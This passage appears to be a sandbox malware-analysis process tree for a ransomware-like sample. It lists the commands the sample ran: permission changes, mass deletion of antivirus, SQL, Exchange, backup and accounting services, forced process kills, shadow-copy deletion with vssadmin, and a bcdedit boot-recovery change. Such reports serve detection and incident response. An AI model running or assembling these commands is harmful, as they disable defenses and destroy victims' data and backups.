PID:1360

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:1820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:268

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:1648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:1808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1088

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:636

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:576

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\ProgramData /a
3⤵
- Modifies file permissions
PID:1748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:896

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /g Administrators:f
3⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:920

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Users:r
3⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:836

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Administrators:r
3⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:976

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d SERVICE
3⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1288

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssqlserver
3⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d "network service"
3⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d system
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1816

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssql$sqlexpress
3⤵
PID:1920

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Users\Public /a
3⤵
- Modifies file permissions
PID:1932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1536

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /g Administrators:f
3⤵
PID:1272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Users:r
3⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Administrators:r
3⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d SERVICE
3⤵
PID:692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssqlserver
3⤵
PID:320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1240

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d "network service"
3⤵
PID:1720

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d system
3⤵
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssql$sqlexpress
3⤵
PID:580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:576

C:\Windows\SysWOW64\sc.exe
sc delete "vmickvpexchange"
3⤵
- Launches sc.exe
PID:608

C:\Windows\SysWOW64\sc.exe
sc delete "vmicguestinterface"
3⤵
PID:1512

C:\Windows\SysWOW64\sc.exe
sc delete "vmicshutdown"
3⤵
PID:920

C:\Windows\SysWOW64\sc.exe
sc delete "vmicheartbeat"
3⤵
- Launches sc.exe
PID:1628

C:\Windows\SysWOW64\sc.exe
sc delete "vmicrdv"
3⤵
PID:1796

C:\Windows\SysWOW64\sc.exe
sc delete "storflt"
3⤵
- Launches sc.exe
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete "vmictimesync"
3⤵
- Launches sc.exe
PID:1952

C:\Windows\SysWOW64\sc.exe
sc delete "vmicvss"
3⤵
PID:1288

C:\Windows\SysWOW64\sc.exe
sc delete "hvdsvc"
3⤵
PID:1700

C:\Windows\SysWOW64\sc.exe
sc delete "nvspwmi"
3⤵
PID:1684

C:\Windows\SysWOW64\sc.exe
sc delete "wmms"
3⤵
- Launches sc.exe
PID:700

C:\Windows\SysWOW64\sc.exe
sc delete "AvgAdminServer"
3⤵
PID:1016

C:\Windows\SysWOW64\sc.exe
sc delete "AVG Antivirus"
3⤵
- Launches sc.exe
PID:1816

C:\Windows\SysWOW64\sc.exe
sc delete "avgAdminClient"
3⤵
PID:1920

C:\Windows\SysWOW64\sc.exe
sc delete "SAVService"
3⤵
- Launches sc.exe
PID:2032

C:\Windows\SysWOW64\sc.exe
sc delete "SAVAdminService"
3⤵
- Launches sc.exe
PID:1536

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos AutoUpdate Service"
3⤵
PID:1404

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Clean Service"
3⤵
- Launches sc.exe
PID:1612

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Device Control Service"
3⤵
PID:1944

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
PID:1400

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos File Scanner Service"
3⤵
PID:1116

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Health Service"
3⤵
- Launches sc.exe
PID:1344

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Agent"
3⤵
- Launches sc.exe
PID:1088

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Client"
3⤵
- Launches sc.exe
PID:568

C:\Windows\SysWOW64\sc.exe
sc delete "SntpService"
3⤵
- Launches sc.exe
PID:564

C:\Windows\SysWOW64\sc.exe
sc delete "swc_service"
3⤵
- Launches sc.exe
PID:588

C:\Windows\SysWOW64\sc.exe
sc delete "swi_service"
3⤵
- Launches sc.exe
PID:1568

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos UI"
3⤵
- Launches sc.exe
PID:576

C:\Windows\SysWOW64\sc.exe
sc delete "swi_update"
3⤵
- Launches sc.exe
PID:580

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Web Control Service"
3⤵
- Launches sc.exe
PID:608

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Safestore Service"
3⤵
- Launches sc.exe
PID:920

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos System Protection Service"
3⤵
- Launches sc.exe
PID:1512

C:\Windows\SysWOW64\sc.exe
sc delete "hmpalertsvc"
3⤵
- Launches sc.exe
PID:1628

C:\Windows\SysWOW64\sc.exe
sc delete "RpcEptMapper"
3⤵
PID:1796

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
- Launches sc.exe
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete "SophosFIM"
3⤵
- Launches sc.exe
PID:1952

C:\Windows\SysWOW64\sc.exe
sc delete "swi_filter"
3⤵
- Launches sc.exe
PID:1288

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdGuardianDefaultInstance"
3⤵
PID:1700

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdServerDefaultInstance"
3⤵
PID:1684

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
3⤵
- Launches sc.exe
PID:1980

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLSERVER"
3⤵
PID:1792

C:\Windows\SysWOW64\sc.exe
sc delete "SQLSERVERAGENT"
3⤵
PID:1836

C:\Windows\SysWOW64\sc.exe
sc delete "SQLBrowser"
3⤵
- Launches sc.exe
PID:560

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY"
3⤵
- Launches sc.exe
PID:296

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer130"
3⤵
PID:696

C:\Windows\SysWOW64\sc.exe
sc delete "SSISTELEMETRY130"
3⤵
PID:1576

C:\Windows\SysWOW64\sc.exe
sc delete "SQLWriter"
3⤵
PID:536

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:1648

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$VEEAMSQL2012"
3⤵
- Launches sc.exe
PID:692

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL"
3⤵
PID:1808

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent"
3⤵
PID:320

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerADHelper100"
3⤵
PID:1240

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerOLAPService"
3⤵
PID:1532

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer100"
3⤵
PID:1552

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer"
3⤵
- Launches sc.exe
PID:636

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY$HL"
3⤵
- Launches sc.exe
PID:1548

C:\Windows\SysWOW64\sc.exe
sc delete "TMBMServer"
3⤵
PID:996

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$PROGID"
3⤵
- Launches sc.exe
PID:1492

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$WOLTERSKLUWER"
3⤵
- Launches sc.exe
PID:960

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$PROGID"
3⤵
PID:1460

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
PID:2024

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
- Launches sc.exe
PID:976

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$OPTIMA"
3⤵
- Launches sc.exe
PID:1560

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$OPTIMA"
3⤵
PID:1508

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer$OPTIMA"
3⤵
PID:556

C:\Windows\SysWOW64\sc.exe
sc delete "msftesql$SQLEXPRESS"
3⤵
- Launches sc.exe
PID:1188

C:\Windows\SysWOW64\sc.exe
sc delete "postgresql-x64-9.4"
3⤵
- Launches sc.exe
PID:700

C:\Windows\SysWOW64\sc.exe
sc delete "WRSVC"
3⤵
- Launches sc.exe
PID:1540

C:\Windows\SysWOW64\sc.exe
sc delete "ekrn"
3⤵
PID:1816

C:\Windows\SysWOW64\sc.exe
sc delete "ekrnEpsw"
3⤵
- Launches sc.exe
PID:1932

C:\Windows\SysWOW64\sc.exe
sc delete "klim6"
3⤵
- Launches sc.exe
PID:2032

C:\Windows\SysWOW64\sc.exe
sc delete "AVP18.0.0"
3⤵
- Launches sc.exe
PID:1204

C:\Windows\SysWOW64\sc.exe
sc delete "KLIF"
3⤵
- Launches sc.exe
PID:1404

C:\Windows\SysWOW64\sc.exe
sc delete "klpd"
3⤵
PID:1612

C:\Windows\SysWOW64\sc.exe
sc delete "klflt"
3⤵
- Launches sc.exe
PID:268

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupdisk"
3⤵
- Launches sc.exe
PID:640

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupflt"
3⤵
- Launches sc.exe
PID:1116

C:\Windows\SysWOW64\sc.exe
sc delete "klkbdflt"
3⤵
- Launches sc.exe
PID:1128

C:\Windows\SysWOW64\sc.exe
sc delete "klmouflt"
3⤵
- Launches sc.exe
PID:1088

C:\Windows\SysWOW64\sc.exe
sc delete "klhk"
3⤵
PID:568

C:\Windows\SysWOW64\sc.exe
sc delete "KSDE1.0.0"
3⤵
PID:564

C:\Windows\SysWOW64\sc.exe
sc delete "kltap"
3⤵
PID:588

C:\Windows\SysWOW64\sc.exe
sc delete "ScSecSvc"
3⤵
PID:1568

C:\Windows\SysWOW64\sc.exe
sc delete "Core Mail Protection"
3⤵
- Launches sc.exe
PID:576

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning Server"
3⤵
- Launches sc.exe
PID:580

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning ServerEx"
3⤵
- Launches sc.exe
PID:608

C:\Windows\SysWOW64\sc.exe
sc delete "Online Protection System"
3⤵
PID:1512

C:\Windows\SysWOW64\sc.exe
sc delete "RepairService"
3⤵
- Launches sc.exe
PID:920

C:\Windows\SysWOW64\sc.exe
sc delete "Core Browsing Protection"
3⤵
- Launches sc.exe
PID:1628

C:\Windows\SysWOW64\sc.exe
sc delete "Quick Update Service"
3⤵
- Launches sc.exe
PID:1796

C:\Windows\SysWOW64\sc.exe
sc delete "McAfeeFramework"
3⤵
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete "macmnsvc"
3⤵
PID:1952

C:\Windows\SysWOW64\sc.exe
sc delete "masvc"
3⤵
PID:1288

C:\Windows\SysWOW64\sc.exe
sc delete "mfemms"
3⤵
PID:1968

C:\Windows\SysWOW64\sc.exe
sc delete "mfevtp"
3⤵
- Launches sc.exe
PID:1188

C:\Windows\SysWOW64\sc.exe
sc delete "TmFilter"
3⤵
- Launches sc.exe
PID:700

C:\Windows\SysWOW64\sc.exe
sc delete "TMLWCSService"
3⤵
PID:1540

C:\Windows\SysWOW64\sc.exe
sc delete "tmusa"
3⤵
PID:1856

C:\Windows\SysWOW64\sc.exe
sc delete "TmPreFilter"
3⤵
- Launches sc.exe
PID:1836

C:\Windows\SysWOW64\sc.exe
sc delete "TMSmartRelayService"
3⤵
PID:560

C:\Windows\SysWOW64\sc.exe
sc delete "TMiCRCScanService"
3⤵
PID:296

C:\Windows\SysWOW64\sc.exe
sc delete "VSApiNt"
3⤵
- Launches sc.exe
PID:1536

C:\Windows\SysWOW64\sc.exe
sc delete "TmCCSF"
3⤵
- Launches sc.exe
PID:1576

C:\Windows\SysWOW64\sc.exe
sc delete "tmlisten"
3⤵
PID:1944

C:\Windows\SysWOW64\sc.exe
sc delete "TmProxy"
3⤵
PID:1648

C:\Windows\SysWOW64\sc.exe
sc delete "ntrtscan"
3⤵
- Launches sc.exe
PID:692

C:\Windows\SysWOW64\sc.exe
sc delete "ofcservice"
3⤵
- Launches sc.exe
PID:1344

C:\Windows\SysWOW64\sc.exe
sc delete "TmPfw"
3⤵
- Launches sc.exe
PID:320

C:\Windows\SysWOW64\sc.exe
sc delete "PccNTUpd"
3⤵
PID:1720

C:\Windows\SysWOW64\sc.exe
sc delete "PandaAetherAgent"
3⤵
PID:1532

C:\Windows\SysWOW64\sc.exe
sc delete "PSUAService"
3⤵
- Launches sc.exe
PID:1552

C:\Windows\SysWOW64\sc.exe
sc delete "NanoServiceMain"
3⤵
- Launches sc.exe
PID:636

C:\Windows\SysWOW64\sc.exe
sc delete "EPIntegrationService"
3⤵
PID:1548

C:\Windows\SysWOW64\sc.exe
sc delete "EPProtectedService"
3⤵
- Launches sc.exe
PID:996

C:\Windows\SysWOW64\sc.exe
sc delete "EPRedline"
3⤵
PID:1408

C:\Windows\SysWOW64\sc.exe
sc delete "EPUpdateService"
3⤵
- Launches sc.exe
PID:1460

C:\Windows\SysWOW64\sc.exe
sc delete "EPSecurityService"
3⤵
PID:960

C:\Windows\SysWOW64\sc.exe
sc delete "UniFi"
3⤵
PID:2024

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im PccNTMon.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im NTRtScan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmListen.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmCCSF.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmProxy.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmPfw.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im CNTAoSMgr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msmdsrv.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlceip.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im Ssms.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im SQLAGENT.EXE
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdhost.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im ReportingServicesService.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im pg_ctl.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im postgres.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:1796

C:\Windows\SysWOW64\net.exe
net stop MSSQL$ISARS
3⤵
PID:268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
4⤵
PID:640

C:\Windows\SysWOW64\net.exe
net stop MSSQL$MSFW
3⤵
PID:1532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
4⤵
PID:896

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ISARS
3⤵
PID:1792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
4⤵
PID:588

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$MSFW
3⤵
PID:1540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
4⤵
PID:1688

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:920

C:\Windows\SysWOW64\net.exe
net stop ReportServer$ISARS
3⤵
PID:960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$ISARS
4⤵
PID:836

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:1628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:1856

C:\Windows\SysWOW64\net.exe
net stop WinDefend
3⤵
PID:1920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WinDefend
4⤵
PID:1272

C:\Windows\SysWOW64\net.exe
net stop mr2kserv
3⤵
PID:2024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mr2kserv
4⤵
PID:536

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
3⤵
PID:1816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
4⤵
PID:2032

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFBA
3⤵
PID:2036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeFBA
4⤵
PID:872

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
3⤵
PID:1232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
4⤵
PID:564

C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA
3⤵
PID:1796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA
4⤵
PID:976

C:\Windows\SysWOW64\net.exe
net stop ShadowProtectSvc
3⤵
PID:640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShadowProtectSvc
4⤵
PID:268

C:\Windows\SysWOW64\net.exe
net stop SPAdminV4
3⤵
PID:896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPAdminV4
4⤵
PID:1532

C:\Windows\SysWOW64\net.exe
net stop SPTimerV4
3⤵
PID:588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTimerV4
4⤵
PID:1792

C:\Windows\SysWOW64\net.exe
net stop SPTraceV4
3⤵
PID:1688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPTraceV4
4⤵
PID:1540

C:\Windows\SysWOW64\net.exe
net stop SPUserCodeV4
3⤵
PID:920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPUserCodeV4
4⤵
PID:608

C:\Windows\SysWOW64\net.exe
net stop SPWriterV4
3⤵
PID:836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPWriterV4
4⤵
PID:960

C:\Windows\SysWOW64\net.exe
net stop SPSearch4
3⤵
PID:560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPSearch4
4⤵
PID:932

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:1836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:1036

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:2024

C:\Windows\SysWOW64\net.exe
net stop firebirdguardiandefaultinstance
3⤵
PID:2032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
4⤵
PID:1816

C:\Windows\SysWOW64\net.exe
net stop ibmiasrw
3⤵
PID:872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ibmiasrw
4⤵
PID:2036

C:\Windows\SysWOW64\net.exe
net stop QBCFMonitorService
3⤵
PID:1716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService
4⤵
PID:1400

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:636

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:2040

C:\Windows\SysWOW64\net.exe
net stop QBPOSDBServiceV12
3⤵
PID:1944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBPOSDBServiceV12
4⤵
PID:1552

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
3⤵
PID:188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
4⤵
PID:580

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
3⤵
PID:1748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
4⤵
PID:996

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:1568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:1408

C:\Windows\SysWOW64\net.exe
net stop "Simply Accounting Database Connection Manager"
3⤵
PID:576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
4⤵
PID:1876

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB1
3⤵
PID:1572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB1
4⤵
PID:1932

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB2
3⤵
PID:1460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB2
4⤵
PID:1856

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB3
3⤵
PID:932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB3
4⤵
PID:560

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB4
3⤵
PID:1036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB4
4⤵
PID:1836

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB5
3⤵
PID:2024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB5
4⤵
PID:536

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im UniFi.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe
C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe
2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1768

C:\Windows\system32\vssadmin.exe
"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
3⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
